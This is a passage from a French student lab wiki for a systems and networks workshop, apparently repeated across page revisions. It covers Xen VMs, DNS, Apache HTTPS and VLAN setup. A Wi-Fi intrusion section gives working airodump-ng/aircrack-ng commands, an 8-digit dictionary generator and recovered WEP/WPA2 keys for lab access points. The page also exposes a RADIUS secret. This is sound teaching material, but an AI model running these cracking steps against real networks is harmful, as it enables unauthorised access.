sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-12T15:18:34Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

=== Infos concernant notre binôme : ===
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Sur capbreton ===
Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

=== Sur la machine de service ===
Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>dans /etc/network/interfaces<syntaxhighlight>
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.69.2/24
gateway 192.168.69.1

auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==

<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.69.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-12T15:09:00Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

=== Infos concernant notre binôme : ===
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Sur capbreton ===
Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

=== Sur la machine de service ===
Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>dans /etc/network/interfaces<syntaxhighlight>
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.69.2/24
gateway 192.168.69.1

auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==

<syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
